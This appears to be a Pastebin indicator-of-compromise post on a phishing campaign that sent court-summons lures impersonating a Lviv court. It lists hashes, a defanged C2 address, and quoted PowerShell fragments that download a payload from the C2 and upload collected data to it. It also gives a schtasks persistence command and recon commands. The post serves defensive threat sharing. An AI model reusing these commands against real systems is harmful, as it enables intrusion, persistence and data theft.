Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #WSH #RAR #SFX #powershell #task
- https://pastebin.com/rpFYCNPS
- attack_vector
- --------------
- email attach .rar (sfx) > .lnk > ps > task > Libraries.vbs > connect > recon > exfil
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: Wed, 08 Nov 2023 11:48:25 +0200
- Subject: Розсилка процесуальних документів, справа № 623/6341/11, Судова повістка про виклик в суд.
- From: СПД 3.9 (Франківський районний суд м.Львова) <spd.1331.ics.gov@ukr.net>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
- File name Повiстка-623-6341-11.rar [ WinRAR Self Extracting archive ]
- File size 331.92 KB (339886 bytes)
- SHA-256 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
- File name Повiстка-623-6341-11.docx.lnk [ Windows shortcut ]
- File size 19.86 KB (20332 bytes)
- SHA-256 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
- File name Libraries.vbs [ WSH ]
- File size 747 B (747 bytes)
- SHA-256 f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
- File name 623-6341-11.docx [ Microsoft Word 2007+ ]
- File size 13.52 KB (13840 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email_attach
- C2 196.196. 156{ .2
- netwrk
- --------------
- 196.196. 156{ .2 196.196. 156{ .2:57881 57881 HTTP GET /HcKOAhaZgDePKGKF/page213/upgrade.txt HTTP/1.1
- 196.196. 156{ .2 196.196. 156{ .2:49210 49210 HTTP POST /page213 HTTP/1.1
- comp
- --------------
- powershell.exe 916 196.196. 156{ .2 57881
- powershell.exe 916 196.196. 156{ .2 49210
- proc
- --------------
- powershell.exe ...
- WINWORD.EXE /n /dde
- schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f
- {another context}
- WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
- powershell.exe net.webclient;$flm=$iik.
- downloaddata ('196.196.156{ .2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');
- uploaddata('196.196.156{ .2:49210/page213',$drpy);}
- ...
- whoami.exe
- systeminfo.exe
- ipconfig.exe
- net.exe" view
- ROUTE.EXE print -4 -6
- RP.EXE -a
- NETSTAT.EXE -ant
- TRACERT.EXE 8.8.8.8
- persist
- --------------
- \ExplorerCoreUpdateTaskMachine C:\Users\Public\Libraries\Libraries.vbs [task]
- drop
- --------------
- %temp%\623-6341-11.docx
- C:\Users\Public\Libraries\Libraries.vbs
- # # # # # # # #
- additional info
- # # # # # # # #
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a/details
- https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/details
- https://www.virustotal.com/gui/file/39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe/details
- https://www.virustotal.com/gui/file/f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e/details
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement